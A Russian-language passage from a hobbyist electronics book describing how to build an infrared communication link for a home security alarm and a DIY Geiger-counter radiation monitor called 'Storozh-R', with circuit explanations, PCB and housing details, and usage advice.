*) Заметим, что дешифратору безразлично состоянием старшего разряда регистра DD5, поскольку по окончании записи на его выв. 2 обязательно окажется 1 - стартовый бит кодовой комбинации или первый бит помехи.

 

Рис. 49. ИК приемник «электронного пароля»

Изображение: 

Рис. 50. Эпюры сигналов для кода «111011100111001»

Изображение: 

Рис. 51. Дешифратор для кода «111011100111001»

Изображение: 

Рис. 52. Печатная плата ИК приемника «электронного пароля»

Изображение: 

Рис. 53. Выкройка экрана фотоусилителя

Изображение: 

Рис. 54. Электронный ключ с задержкой

Изображение: 

12. ИК линия связи в охранной системе

ИК линия связи в охранной системе

Большие помехи в радиоэфире, легкость обнаружения переданного по радио и последующей его имитации, административно-финансовые препятствия, созданные перед каждым желающим воспользоваться радиоканалом в своей охранной системе (ОС)*, заставляют искать здесь какие-то иные средства связи. С появлением полупроводниковых излучателей, способных генерировать мощные ИК вспышки, и фотодиодов с встроенной оптикой инфракрасный диапазон стал представлять интерес и в этом отношении.

В линии связи, работающей в системе охранной сигнализации, должны, очевидно, по-разному представляться три возможные ситуации: а) на охраняемом объекте нарушений нет; б) объект передает сигнал тревоги; в) «обрыв» в канале связи.

*) В России передачу сигналов охранных систем по радио разрешено вести лишь в двух частотных каналах (см. с. 10). Это - для всех нас. Напомним, что в особом состоянии ионосферы, на так называемом «проходе», помеху, блокирующую радиоканал, может вызвать не только сигнал соседа, находящегося «лишь» в 5...10 км, но и радиопередатчик, удаленный на 1.5...2 тысячи километров.

 

13. Передатчик в ИК линии связи

Передатчик в ИК линии связи

Его принципиальная схема приведена на рис. 55. Здесь DD1.1, DD1.2, R3, ZQ1 - тактовый генератор, возбуждающийся на частоте кварцевого резонатора fр=32768 Гц. DD3 - счетчик, на выходе 11 (выв. 15) которого формируется 16-герцовый меандр (f11=fр/2^11), а на выходе 14 (выв. 3) - 2-герцовый (f14=fр/2^14). Элементы DD2.1- DD2.4 образуют переключатель, на выходе которого (выход DD2.4) возникает 2-герцовый или 16-герцовый меандр в зависимости от уровня напряжения на входе 5 элемента DD2.1*.

Из фронта меандра дифференцирующая цепочка R5C3 и импульсный усилитель DD1.4-DD1.6 формируют в базе нормально запертого транзистора VT1 импульс тока длительностью tи@10 мкс (tи@R5·C3). Возникающий в цепи коллектора транзистора VT1 ток возбуждает ИК диод BI1 ив пространство излучается короткая ИК вспышка.

Итак, ИК передатчик всегда что-то излучает - либо редкие, 2-герцовые импульсы, если оснований для тревоги нет, либо частые,
16-герцовые - тревожные.

2-28.jpg

Рис. 55. Передатчик ИК линии связи

2-29.jpg

Рис. 56. Печатная плата передатчика

На рис. 56 показана печатная плата передатчика, которую изготавливают из двухстороннего фольгированного стеклотекстолита толщиной 1,5 мм. Фольга со стороны деталей используется лишь в качестве нулевого провода-«земли»; в местах пропуска проводников в ней вытравлены фрагменты той или иной конфигурации. Место пайки к нуль-фольге «заземляемого» вывода резистора, конденсатора и др. показано зачерненным квадратом; соединение с ней вывода микросхемы или проволочной перемычки - квадратом со светлой точкой в центре.

В центре платы сверлят отверстие под ИК диод, его выводы припаивают к соответствующим уширениям на печатных проводниках внакладку.

Все резисторы ИК передатчика - типа МЛТ-0,125. Конденсаторы: С1, С2, С5 - КМ-6 (выводы в одну сторону); С4 - К50-6; С6 - TOWA или другой, диаметром не более 10 мм; СЗ - КМ-5 (выводы в разные стороны).

Имеющиеся в продаже ИК диоды предназначены для работы в устройствах дистанционного управления бытовыми радиоаппаратами и обычно имеют довольно широкий - до 30...400 - лепесток излучения. Для увеличения «дальнобойности» такого излучателя в него нужно ввести линзу-конденсор. Так, как показано на рис. 57. Здесь: 1 - печатная плата передатчика; 2 - ИК-диод; 3 - корпус передатчика (ударопрочный полистирол толщиной 2...2,5 мм); 4 - обойма стандартной 5-кратной часовой лупы (на ней должен быть значок «х5»); 5 - ее линза.

2-30.jpg

Рис.57. Корпус с линзой- концентратором

Лупу приклеивают к передней стенке корпуса (клей - распущенные в растворителе 647 или RS-2 кусочки полистирола; им же клеят и сам корпус), в которой сделано отверстие диаметром 30...35 мм. При указанном на чертеже расстоянии между основанием лупы и печатной платой ИК диод оказывается в фокусе ее линзы, его излучение сжимается в узкий луч и освещенность окна фотоприемника на другом конце ИК линии связи многократно увеличивается.

Важнейшим параметром ИК передатчика, как и любого элемента охранной техники, является его энергопотребление в дежурном режиме. В таблице 11 показана зависимость потребляемого им тока Iпотр от напряжения источника питания Uпит. В режиме передачи тревожного сигнала Iпотр увеличивается примерно на 10%.

Невысокое общее энергопотребление позволяет ввести резервный источник питания непосредственно в корпус ИК передатчика без увеличения его габаритов. Это может быть, например, 6-вольтная батарея типа 11А (Ж10,3х16 мм, емкость 33 мА·ч) или 476А (Ж13х25 мм, емкость 105 мА·ч). Показанная в таблице 11 зависимость тока в ИК диоде Iимп от напряжения питания позволяет судить о мощности ИК вспышек, излучаемых передатчиком, и, соответственно, о его «дальнобойности».

Таблица 11

Uпит ,B

Iпотр, мА

Iимп, А

4,2

0,20

0,36

5,0

0,40

0,46

6.0

0,77

0,64

7,0

1,30

0,82

8,0

1,90

0,97

9,0

2,70

1.23

10,0

3,60

1,38


 

Размещая передатчик, нужно помнить об очень узкой диаграмме его излучения. Узел крепления должен позволить точную наводку передатчика и жесткую его фиксацию в лучшем положении. Можно воспользоваться, например, шарнирной головкой от фотоаппарата или кинокамеры, установив ее на стене, раме окна и т.п. Или выполнить этот узел в виде двух латунных пятачков, соединенных отожженной медной

2-31.jpg

Рис. 58. Узел крепления передатчика

проволокой диаметром 2...2,5 мм (рис. 58). Один из пятачков крепят винтами к боковой стенке излучателя (резьба - в стенке), другой - шурупами к опоре. Проволоку сгибают так, чтобы излучатель занял нужное положение. Во избежание значительных вибраций она должна быть возможно более короткой.

Испытания показали, что при Uпит=6 В передатчик способен обеспечить связь на расстоянии r@70 метров (с отоприемником, описание которого приведено ниже). Но это не предел. Зависимость r от Iимп при прочих равных условиях имеет вид: г@к·ЦIимп , где к - коэффициент, учитывающий «Прочие условия». Таким образом, при Uпит =10 В r@100 м. Ток в ИК диоде может быть увеличен и за счет сопротивления резистора R7: Iимп=[Uпит-4] /R7 (Iимп - в амперах, Uпит - в вольтах, R7 - в омах). Но делать это нужно с осторожностью: в любом сочетании Uпит и R7 амплитуда тока в ИК диоде не должна превышать предельно допустимую (см. приложение 3).

Значительное увеличение яркости ИК вспышки можно получить, перестроив «сильноточную» часть импульсного усилителя так, как показано на рис. 59 (печатная плата - на рис. 60, а, б). В этом случае может быть достигнут ток в импульсе Iимп=10 А - допустимый для ИК диода типа АЛ123А. Резистор R4 - самодельный, отмеренный по цифровому омметру или вычисленный (см. приложение 8) отрезок нихромовой, константановой или манганиновой проволоки.

2-32.jpg
Рис. 59. Головка излучателя с ИК диодом АЛ123А

2-33.jpg

Рис. 60. Печатная плата головки мощного ИК излучателя

Амплитуду и форму тока, возбуждающего ИК диод, можно проконтролировать осциллографом, подключив его к резистору R4.

Излучающую головку можно выполнить в виде отдельного блока во «всепогодном» исполнении. Все остальные элементы ИК излучателя могут войти в электронную часть охранной системы в качестве ее фрагмента, связанного с ИК головкой лишь тонким трехпроводным кабелем.

2-34.jpg

Рис. 61. Приемник ИК линии связи

*) Выделенное на рисунке штрих-пунктиром - пример датчика охранной системы, формирующего на своем выходе нужный сигнал.

 

Рис. 55. Передатчик ИК линии связи

Изображение: 

Рис. 56. Печатная плата передатчика

Изображение: 

Рис. 58. Узел крепления передатчика

Изображение: 

Рис. 59. Головка излучателя с ИК диодом АЛ123А

Изображение: 

Рис. 60. Печатная плата головки мощного ИК излучателя

Изображение: 

Рис. 61. Приемник ИК линии связи

Изображение: 

Рис.57. Корпус с линзой- концентратором

Изображение: 

14. Приемник в ИК линии связи

Приемнике ИК линии связи

Принципиальная схема приемника в ИК линии связи приведена на рис. 61. Здесь DA1 - усилитель-формирователь, преобразующий ИК вспышку, освещающую фотодиод BL1, в импульс напряжения с амплитудой U10@Uc4 (эпюра 1 на рис. 62). Одновибратор, выполненный на элементах DD1.1, DD2.1 и др., расширяет этот импульс* до tф1@R2·C5@15 мс (эпюра 2 на рис. 62) для задержки его спада (1) на входе С счетчика DD3 и формирования «щелчка» длительностью tф1, в звуковом генераторе, выполненном на DD2.5, DD2.6, BF1 и др.

Одновибратор DD1.3, DD2.3 и др. формирует импульс длительностью tф2@R4·C6@1,5 с (эпюра 3 на рис. 62), разрешающий беспрепятственный подсчет импульсов в DD3 лишь на этом временном интервале.

Приемник активизируется фронтом первой же ИК вспышки. Из него формируется короткий (tr@R6-C7) импульс на входе R счетчика DD3 (эпюра 4 на рис. 62), устанавливающий счетчик в предстартовое состояние (ему соответствует 0 - напряжение низкого уровня - на всех его выходах), а спадом импульса длительностью tф1

2-35.jpg

Рис. 62. Эпюры сигналов

в счетчик записывается первая единица. Если на фотоприемник поступают импульсы, следующие с частотой 2 Гц (с такой частотой, напомним, следуют ИК вспышки, если датчики на охраняемом объекте не потревожены), то на выходе 4 (выв. 5) счетчика DD3 сохраняется 0, так как фронтом четвертого импульса (он появится через 0,5х4=2 с - по окончании разрешающего счет интервала tф2 =1,5 с) счетчик DD3 будет возвращен в исходное состояние.

По иному ведет себя приемник, если на него приходят ИК импульсы, период следования которых равен 62,5 мс, т.е. - сигнал тревоги. Поскольку 62,5х4=250 мс < tф2-1,5 с, то четвертый импульс переведет счетчик DD3 в состояние «4» (000100; на его выводе 5 появляется 1 - напряжение, близкое к напряжению питания), счетчик в этом состоянии самозаблокируется (сигнал 1 на входе 8 элемента DD1.2 делает его нечувствительным к сигналам на входе 9), а включившийся красный светодиод HL1 и 16-герцовые щелчки звукового генератора доведут сигнал тревоги до окружающих (эпюры 5 и 6 на рис. 62). Это будет продолжаться примерно 1,25 с (tф2 -0,25), после чего возникнет 0,25-секундная пауза и тревожная сигнализация повторится.

При обрыве связи приемник ведет себя иначе. Если на временном интервале tобр (tобр=R11·C8) приемник не обнаруживает ИК вспышки, конденсатор С8 разряжается по цепи VD6, R11, DD2.3, транзистор VT1 открывается до насыщения, напряжение на резисторе R8 увеличивается с -О В почти до напряжения питания, на выходе DD 1.4 устанавливается напряжение низкого уровня и звуковой генератор начинает излучать монотонный сигнал с частотой fтон@1/2R14·C9. С появлением первой же ИК вспышки конденсатор С8 быстро заряжается по цепи R10, VD5, тональное излучение прекращается и приемник приступает к анализу поступающих сигналов.

Печатную плату приемника изготавливают из двустороннего фольгированного стеклотекстолита 50х50 мм толщиной 1,5 мм (рис. 63) подобно тому, как это сделано в ИК передатчике.

Фотоголовку ИК приемника (BL1, DA1 и др.), обладающую высокой чувствительностью к электрическим наводкам в широком спектре частот, необходимо экранировать. Экран изготавливают из жести, его выкройка показана на рис. 64. Штриховые линии здесь - места сгибов. Согнутый экран пропаивают в углах, выравнивают его низ и, установив в нужном положении

2-36.jpg

Рис. 63. Печатная плата приемника

на нуль-фольгу (на плате оно показано штриховой линией), припаивают к ней в двух-трех точках.

Конструктивно ИК приемник может быть выполнен так, как показано на рис. 65. Здесь: 1 - корпус приемника (черный полистирол толщиной 2...2,5 мм); 2 - обойма 7-кратной ручной лупы (ручка срезана); 3 - ее линза; 4 - печатная плата; 5 - экран фотоголовки;

6 - фотодиод ФД 263-01. Обойму лупы приклеивают к передней стенке корпуса, имеющей отверстие диаметром 35 мм (клей — распущенные в растворителе 647 или в RS-2 кусочки полистирола).

Расстояние между стоящими соосно фотодиодом и линзой должно быть близко к ее фокусному расстоянию. Это сконцентрирует

2-37.jpg

Рис. 65. Конструкция приемника

поступающий световой поток на фотодиоде и значительно увеличит чувствительность фотоприемника к слабым сигналам**.

К узлу крепления приемника предъявляются те же требования, что и к креплению передатчика: должна быть обеспечена удобная его наводка и надежная фиксация в лучшем положении.

Если по условиям связи ИК приемник должен быть вынесен на улицу (для связи, например, с автомобилем, стоящим у торца дома, или с квартирой на другом его конце), то его лучше составить их двух частей: внешней, во влагозащитный корпус-бленду которой помещают лишь объектив и фртоголовку, и внутренней - со всем остальным. Эти части связывают тонким трехпроводным кабелем («+», «-», выв. 10 микросхемы DA1).

Приемник может быть дополнен акустическим излучателем большей мощности, например, динамической головкой, включенной так, как показано на рис. 66, или пьезосиреной ACT-10 (рис. 67), сохраняющей достаточную мощность и при пониженном напряжении питания.

Как показали предварительные испытания, протяженность ИК линии связи с описанными здесь ИК приемником и передатчиком достигает 70 метров. Существенное ее увеличение может дать переход

В ИК приемнике важнее диаметр объектива. С его увеличением увеличивается освещенность р-п перехода фотодиода и, соответственно, расстояние, с которого может быть зафиксирована ИК вспышка излучателя.

2-38.jpg

Рис. 66. Динамическая головка в акустическом излучателе

2-39.jpg

Рис. 67. Пьезосиренав акустическом излучателе

на настраиваемую оптику - если вместо неподвижной линзы с ее приблизительной фокусировкой использовать объектив от старого фотоаппарата с наводкой на резкость по расстоянию, «Дальнобойность» передатчика может быть увеличена еще в 1,5...2 раза и более за счет увеличения яркости ИК вспышки.

С другой стороны, в линиях связи, не превышающих 20...25 м (автомобиль или «ракушка» под окнами 3...4-этажного дома, окно дома на другой стороне улицы и т.п.), оптика может не потребоваться вообще, во всяком случае - в ИК приемнике.

*) Напомним, что при умеренной засветке длительность этого импульса близка к длительности самой ИК вспышки. При интенсивной, от близко расположенного излучателя, например, она может увеличиться в 3...5 раз и более из-за относительно медленного «рассасывания» зарядов в р-n переходе фотодиода.

**) Угол расхождения лучей в объективе ИК передатчика, его так называемая апертура, должен соответствовать лепестку ИК диода (см. углы излучения ИК диодов в приложении 3). Тогда объектив «соберет» все его излучение.

 

Рис. 62. Эпюры сигналов

Изображение: 

Рис. 63. Печатная плата приемника

Изображение: 

Рис. 65. Конструкция приемника

Изображение: 

Рис. 66. Динамическая головка в акустическом излучателе

Изображение: 

Рис. 67. Пьезосиренав акустическом излучателе

Изображение: 

ИК-барьер

Изображение: 

7. Осторожно - радиация

ОСТОРОЖНО - РАДИАЦИЯ!

Ионизирующая радиация опасна не только своей высокой поражающей способностью - доза, смертельно опасная для человека, в тепловом ее эквиваленте едва нагрела бы и стакан воды, но и тем, что она никак не воспринимается нашими органами чувств. Ни один из органорецепторов человека не предупредит его о сближении с источником радиации любой интенсивности.

Это обстоятельство позволяло долгое время скрывать от населения происходившие в нашей стране радиационные аварии и их последствия. И даже после взрыва на Чернобыльской АЭС, радиоизотопный след которого ощутила, как минимум, вся Европа, еще несколько лет у нас блокировались любые попытки дать в руки населения приборы, которые позволили бы ему самому позаботиться о своей безопасности. И лишь с появлением* в свободной продаже датчиков ионизирующей радиации - так называемых счетчиков Гейгера - управлявшие нашей страной утеряли, наконец, исключительное право знать то, что не следует, по их мнению, знать населению...


*) Этому «появлению» способствовали не только статьи в журнале «Радио», о которых мы еще будем говорить, но и многомиллионный «АиФ», опубликовавший принципиальную схему чрезвычайно простого прибора радиационного контроля, которому не хватало лишь счетчика Гейгера [14]. Пренебречь последовавшей реакцией, судя по всему, уже не решились.

 

1. «Сторож-Р» - прибор непрерывного радиационного контроля

«Сторож-Р» - прибор непрерывного радиационного контроля

На техногенное загрязнение окружающей среды нередко смотрят как на неизбежную «плату» за те удобства цивилизованной жизни, которые нам предоставляет научно-технический прогресс. Но если о загрязнениях, хоть как-то себя проявляющих, мы можем судить и сами, можем так или иначе минимизировать их воздействие на себя, то по отношению к веществам, полям, средам, недоступным нашим органам чувств, мы оказываемся в ином положении: не только предпринимать какие-либо меры самозащиты, но и просто узнать о появлении такой опасности, даже длительном ее существовании мы не можем.

В таких случаях остается целиком и полностью полагаться на те или иные службы централизованного контроля, сознавая, что по самому характеру своей деятельности, по физическим своим возможностям они в лучшем случае будут следить лишь за среднестатистическим благополучием каждого из нас и его соответствием нормам своих ведомств.

Все это в полной мере относится и к радиационному загрязнению окружающей среды - к радиоизотопам, к их проникающему излучению: невидимому, неслышимому, неосязаемому, не обладающему ни запахом, ни вкусом даже в безусловно недопустимых дозах. Правда, монопольное право на радиационный контроль в нашей стране ведомственные службы недавно утеряли - у населения появились персональные дозиметры.

Но «измерение опасности» - этой первоосновы ведомственного контроля, пришедшей к нам вместе с персональными дозиметрами (в большинстве своем - упрощенными моделями профессиональных), - лишь на первый взгляд кажется чем-то вполне заменяющим органолептический контроль. В том, что ни один из органов чувств человека не может быть отнесен к категории измеряющих, можно, конечно, видеть лишь ни к чему не обязывающие нас особенности эволюции живого. Но то, что потеря любого из них не компенсируется даже самым совершенным произведением нынешней электронной техники, заставляет отнестись к органолептической ориентации - к самой ее идеологии, ее шкале ценностей - с должным вниманием. Как, соответственно, и к приборам, способным подобным же образом ориентировать человека в потенциально опасных для него новых средах.

Техника персональной ориентации человека в продуктах и отходах современной цивилизации призвана решать задачи, непосильные для специалистов-профессионалов, независимо от их числа, квалификации и оснащения. Всегда - как это неизменно выяснялось - недостаточных.

Но какими же могут быть функции у приборов «органолептического» контроля радиационной обстановки? Чем, собственно, они должны отличаться от обычных дозиметров? И вообще - располагаем ли мы для этого достаточными средствами?

Органолептический прибор радиационного контроля - радиационный технорецептор - отличается от дозиметрического прежде всего своим назначением: он обязан своевременно поставить в известность своего владельца о его сближении с источником радиации, о появлении пока еще потенциальной для него опасности.

Техническое обеспечение такого режима работы прибора сказывается почти на всех его параметрах. Так, если энергоэкономичность дозиметра является для него показателем достаточно второстепенным, то для технорецептора он - из важнейших: прибор, не способный работать непрерывно, требующий постоянной заботы о своем энергообеспечении, вообще не может быть отнесен к этой категории. С другой стороны, почти теряет смысл вопрос о точности технорецептора. Во всяком случае в выборе между возможностью «видеть» широкий спектр радиационных излучений и точностью количественной оценки только какой-то его разновидности - лишь гамма-излучения, например, - безусловный приоритет будет иметь спектральная широкополосность прибора.

Различаются эти приборы и по форме представления информации. Радиационный технорецептор должен включать ее в рецепторное пространство человека. То есть, он должен обладать способностью информировать своего владельца о радиационной обстановке и ее изменении без какого-либо запроса с его стороны. Обычные в измерительной технике табло и шкалы здесь, очевидно, ничем помочь не могут.

3-1.jpg

Рис. 68. Радиационный индикатор «Сторож-Р»

Особые требования предъявляются и к надежности технорецептора. Она должна быть не только высокой, но и постоянно проверяемой - отказ прибора должен обнаруживаться незамедлительно.

Органолептический прибор радиационного контроля должен обладать и высокой радиационной чувствительностью, во всяком случае - быть способным контролировать естественный радиационный фон и практически мгновенно реагировать на сколько-нибудь заметные его изменения.

И, наконец, все это мало бы чего стоило, если бы стоило дорого...

С учетом вышеизложенного и был спроектирован «Сторож-Р» - сторож радиационный - прибор непрерывного радиационного контроля.

Его основные параметры:

Спектр контролируемых излучении
b(>0,5 МэВ), g(>0,05 МэВ)
Реакция на естественный радиационный фон (ЕРФ)
акустические импульсы- щелчки, следующие со средней частотой 15...25 имп/мин;
Реакция на изменение уровня радиации
изменение скорости счета (линейная зависимость);
Порог тревожной сигнализации
4...5 ЕРФ
Напряжение источника питания
9 В

Потребляемый ток:

в фоновых радиационных полях

в режиме тревожной сигнализации

 

0,15...0,2 мА

3...4 мА

Время непрерывной работы (с батареей «Корунд»)

> 5000 часов
Время выхода на рабочий режим
<1c
Габариты прибора
120х46х21 мм
Масса прибора (с источником питания)
100 г

Принципиальная схема прибора показана на рис. 68. В качестве датчика ионизирующей радиации BD1 используется счетчик Гейгера типа СБМ20*. Высокое, напряжение на его аноде формирует блокинг-генератор: импульсы напряжения с повышающей обмотки I трансформатора Т1 через диоды VD1, VD2 заряжают конденсатор фильтра С1. Нагрузкой счетчика служит резистор R1 и элементы, связанные с входом 8 микросхемы DD1.

На элементах DD1.1, DD1.2, СЗ и R4 собран одновибратор, преобразующий импульс, поступающий со счетчика Гейгера и имеющий затянутый спад, в «прямоугольный», длительностью 5...7 мс.

Фрагмент схемы, включающий в себя элементы DD1.3, DD1.4, С4 и R5, представляет собой управляемый по входу 6 DD1 звуковой генератор, возбуждающийся на частоте F@1/2·R5·C4@1 кГц, к парафазному выходу которого (выходы 3 и 4 DD1) подключен пьезоизлучатель НА1. Акустический импульс-щелчок возбуждается в нем «пачкой» электрических импульсов.

На элементах VD4, R8...R10, С8 и С9 собран интегратор, управляющий работой порогового усилителя, выполненного на микросхеме DD2.

3-2.jpg

Рис. 69. Печатная плата «Сторожа-Р»

Напряжение на конденсаторе С9 зависит от средней частоты возбуждения счетчика Гейгера; по достижении им потенциала отпирания полевого транзистора, входящего в DD2, включается светодиод HL1: частота и длительность его вспышек будут расти с увеличением уровня радиации.

Прибор монтируют на печатной плате, изготовленной из двустороннего стеклотекстолита толщиной 1,5 мм (рис. 69, а). Фольга обратной стороны используется лишь в качестве нулевой шины (она соединена с «-» источника питания), в местах пропуска проводников в ней вытравлены кружки диаметром 1,5...2 мм.

Двухцокольный счетчик СБМ20 крепят на печатной плате жесткими скобками (стальная проволока диаметром 0,8...0,9 мм). Их надевают внатяг на выводы счетчика и впаивают в предназначенные для них отверстия. Счетчик с мягкими выводами (другое оформление счетчика СБМ20) крепят за корпус охватывающими его тонкими скобками (монтажный провод диаметром 0,4...0,6 мм), отверстия для их распайки - «а-б» и «в-г».

Трансформатор Т1 наматывают на кольцевом сердечнике М3000НМ типоразмера К16х10х4,5 мм. Острые ребра сердечника предварительно заглаживают шкуркой и покрывают весь сердечник электрически и механически прочной изоляцией, например, обматывают лавсановой или фторопластовой лентой.

Первой наматывают обмотку I, она содержит 420 витков Провода ПЭВ-2-0,07. Обмотку ведут почти виток к витку, в одну сторону, оставляя между ее началом и концом промежуток в 1...2 мм. Обмотку I также покрывают изоляцией. Далее наматывают обмотку II-8 витков провода диаметром 0,15...0,2 мм в произвольной изоляции, и поверх нее - обмотку III - 3 витка тем же проводом. Эти обмотки также должны быть распределены по сердечнику возможно равномернее. Расположение обмоток и их выводов должно соответствовать рисунку печатной платы, а их фазировка - указанной на принципиальной схеме (синфазные концы обмоток обозначены точками).

Готовый трансформатор рекомендуется покрыть слоем гидроизоляции - обмотать, например, узкой полоской липкой пластиковой ленты. На плату трансформатор крепят винтом МЗ между двумя эластичными, не продавливающими обмоток, шайбами.

При сборке прибора рекомендуется использовать следующие типы конденсаторов: С1 - К73-9-630В, С2 - КД-26-500В, С8 и С9 - К10-17-26, С5 - К53-30 или К53-19; С7, С10 - К50-40 или К50-35.

При возможных заменах следует иметь в виду, что завышенные утечки конденсаторов С1 и С2 (как и обратный ток диодов VD1 и VD2) могут резко увеличить энергопотребление прибора. Оно может быть заметно увеличено и неудачным выбором конденсатора С5.

Резисторы: R1 - КИМ-0,125 или СЗ-14-0,125, остальные - МЛТ-0,125, С2-23-ОД25 или С2-33-ОД25.

В качестве DD1 можно, конечно, взять микросхему К561ЛА7. Диод КД510А - заменить любым кремниевым с током в импульсе не менее 0,5 А. Светодиод годится практически любой, критерий здесь - достаточная яркость.

Пьезоизлучатель барабанного типа ЗП-1 может быть заменен излучателем с акустическим резонатором - ЗП-12 или ЗП-22. Возможно применение и других пьезоизлучателей. Критерий здесь - достаточна громкость.

Полностью смонтированную печатную плату, пьезоизлучатель и выключатель устанавливают на передней панели прибора, которую изготавливают из ударопрочного полистирола толщиной 2,5 мм (рис. 69, б). Корпус прибора, имеющий форму открытой коробки, изготавливают из полистирола толщиной 1,5...2 мм; по краю, с внутренней его стороны выбирают паз глубиной 2,5 мм для фиксации в нем передней панели прибора по всему ее периметру. Крышку скрепляют с передней панелью винтом М2, место крепления - прилив на отсеке питания с запрессовыванным в нем металлическим вкладышем, имеющим резьбу под винт М2. Поскольку источник питания в приборе меняют очень редко, сдвижную крышку у отсека питания можно не делать.

Так как полистирол может вполне ощутимо ослабить ионизирующее излучение (см. приложения 6 и 7), в стенке корпуса, примыкающей к счетчику Гейгера, делают сквозной вырез, который можно перекрыть лишь редкой решеткой. Такими же решетками перекрывают и акустические вырезы в передней панели и в крышке прибора.

В «Стороже-Р» можно использовать не только счетчики Гейгера типа СБМ20. Годятся, без заметных изменений потребительских свойств и каких-либо переделок прибора, счетчики типа СТС5, СБМ32 и СБМ32К.

Но существуют счетчики Гейгера, способные значительно увеличить общую и спектральную чувствительность прибора. Например, СБТ7, СБТ9, СБТ10А, СБТ11, СИ8Б, СИ13Б, СИ14Б. Все они имеют тонкие слюдяные «окна» и обладают высокой чувствительностью не только к гамма- и жесткому бета-, но и к мягкому бета-излучению (а СБТ11 - и к альфа-излучению). Правда, их конфигурация потребует внесения существенных изменений в конструкцию корпуса прибора, в общую его компоновку. Для некоторых из них потребуется и коррекция порога тревожной сигнализации. Информация по счетчикам Гейгера отечественного производства, которые могут быть использованы в самодельных приборах радиационного контроля, приведена в приложении 4.

Ничто, кроме растущих габаритов и стоимости, не может помешать ставить в «Сторож-Р» и несколько счетчиков Гейгера (их включают параллельно) - для увеличения общей и спектральной чувствительности прибора.

Прибор не требует наладки - правильно собранный, он начинает работать сразу. Но есть в нем два резистора, номиналы которых потребуется, возможно, уточнить. Это резистор R5, с помощью которого частоту звукового генератора выводят на частоту механического резонанса пьезоизлучателя (их значительное несовпадние сказывается на громкости щелчка). И резистор R8, определяющий порог тревожной сигнализации (порог повышается при увеличении сопротивления R8). Коррекция порога может потребоваться не только при использовании счетчика, существенно отличающегося от СБМ20 радиационной чувствительностью, но и при перенастройке прибора для работы в условиях повышенного радиационного фона, в условиях, например, уже состоявшегося радиационного загрязнения местности.

«Сторож-Р» прост в обращении и не требует от владельца какой-либо специальной подготовки. Редкое пощелкивание акустических импульсов, следующих друг за другом без видимого порядка, отсутствие тревожной сигнализации (вспышек светодиода) говорят о том, что прибор находится в условиях естественного радиационного фона. Это фоновое пощелкивание почти не зависит от времени суток; сезона и местоположения прибора, несколько замедляясь лишь глубоко под землей и ускоряясь в высокогорье.

Увеличение скорости счета при перемещении прибора, а тем более появление тревожной сигнализации, с очень высокой вероятностью означает, что прибор входит в поле источника радиации искусственного происхождения. Рефлекторное стремление человека покинуть это место - совершенно уместная здесь реакция (удаление от источника - лучший вид радиационной защиты, удаление источника - лучшая дезактивация).

Но можно это сделать и чуть позже, предварительно установив местоположение источника, его связь с тем или иным видимым предметом. Поскольку «Сторож-Р» имеет максимальную чувствительность со стороны своего «окна» — выреза в стенке корпуса, примыкающей к счетчику Гейгера, эта процедура напоминает радиопеленгацию. Направление на источник может быть установлено и приближением к нему: источник находится в направлении, на котором скорость счета растет максимально быстро.

При поиске источников, имеющих значительно меньшие размеры, нежели сам счетчик Гейгера, рекомендуется проводить сканирование подозрительных мест: перемещать прибор, меняя направление его движения и ориентацию. Таким образом положение невидимой простым глазом «горячей» Частицы, например, определяется с точностью до 2...3 мм.

Однако все это может показаться недостаточным. Хотелось бы знать - опасно обнаруженное или нет. Внесем ясность: на этот вопрос не отвечают, не могут ответить и, возможно, не смогут это сделать никогда дозиметрические приборы любых типов. Рецепта отделения «опасного» от «безопасного» в сколько-нибудь сложных случаях - а взаимоотношения живого с радиоизотопами загрязнений относятся к наисложнейшим - может не быть вообще, во всяком случае - рецепта простого, реализацию которого можно было бы передоверить прибору.

Но и это - если «безопасная» радиация существует хотя бы в принципе. К сожалению, в многолетних поисках она так и не была обнаружена. Можно было говорить лишь о большем или меньшем ее вреде. И в цивилизованных странах от идеи существования подпороговой радиации - радиации, воздействие которой совершенно компенсировалось бы какими-то защитными механизмами организма, - отказались. Отказались давно, в США, например, в 1946 году.

Минимизация облучения человека - этическая норма в обращении с источниками ионизирующего излучения. К различным ведомственным нормам, принимающим в качестве допустимых уровни, значительно превышающие естественный радиационный фон, следует относиться как к попыткам найти баланс, взвесив на универсальных весах хозяйственника стоимость защитных мер - с одной стороны - и потери общества от радиационного поражения - с другой.

«Сторож-Р» отличается от большинства теперь уже многочисленных разновидностей бытовых дозиметрических приборов прежде всего тем, что практически полностью устраняет опасность случайного облучения своего владельца. Работая в непрерывном режиме, почти не мешая другим занятиям (любой фон, как признак стабильности ситуации, легко «уходит» в подсознание человека), он мгновенно обращает его внимание на сколько-нибудь заметное изменение радиационной обстановки (другая, столь же фундаментальная особенность нашего восприятия окружающего).

Особенно эффективен «Сторож-Р» в обнаружении компактных радиационных образований - начальной фазы почти любого радиационного загрязнения. К сожалению, в этой фазе своего существования (наиболее доступной, кстати, для дезактивации) они попадают в поле зрения служб радиационного контроля лишь в виде исключения: даже самая совершенная, но находящаяся в отдалении аппаратура физически не в состоянии обнаружить такого рода источники.

Порог тревожной сигнализации в приборе выставлен так, чтобы под ним оказался бы естественный радиационный фон с почти всеми возможными его отклонениями от среднего значения. Лишь очень немногие причины, не связанные с источниками радиации искусственного происхождения, могут вывести «Сторож-Р» в режим тревожной сигнализации**.

Но «Сторож-Р» может быть полезен и в условиях уже состоявшегося радиационного загрязнения местности. Выявление точечных источников и высокоактивных «пятен» на новом, техногенном фоне может оказаться делом даже более актуальным: опыт показывает, что радиационные загрязнения в таких местах отличаются чрезвычайной неравномерностью.

«Сторож-Р» - во многих своих прототипах и модификациях испытывался и находил применение в самых разных регионах нашей страны и за рубежом на протяжении последних сорока лет. С его помощью легко обнаруживались выброшенные «светящиеся» элементы старых приборов и радиоактивные ампулы пожарных датчиков, «горячие» частицы Чернобыля на предметах обихода и уже циркулирующие в кроветоке человека радиоактивные образования, высокоактивные минералы и окаменелости в музеях и коллекциях и продукты питания, миновавшие тройной (как утверждалось) казенный контроль, «освещающие» прохожих ускорители НИИ и радиоактивная «грязь» в медицинских учреждениях. И многое, многое другое...

Но куда чаще «Сторож-Р» снимал необоснованные страхи и подозрения - то, что с долей пренебрежения называют радиофобией, а на самом деле являющиеся нормальной реакцией человека на безличное, «среднестатистическое» к нему отношение.


*) Или, что то же, СБМ-20. В заводской маркировке дефис нередко отсутствует (это относится и к счетчикам других типов).

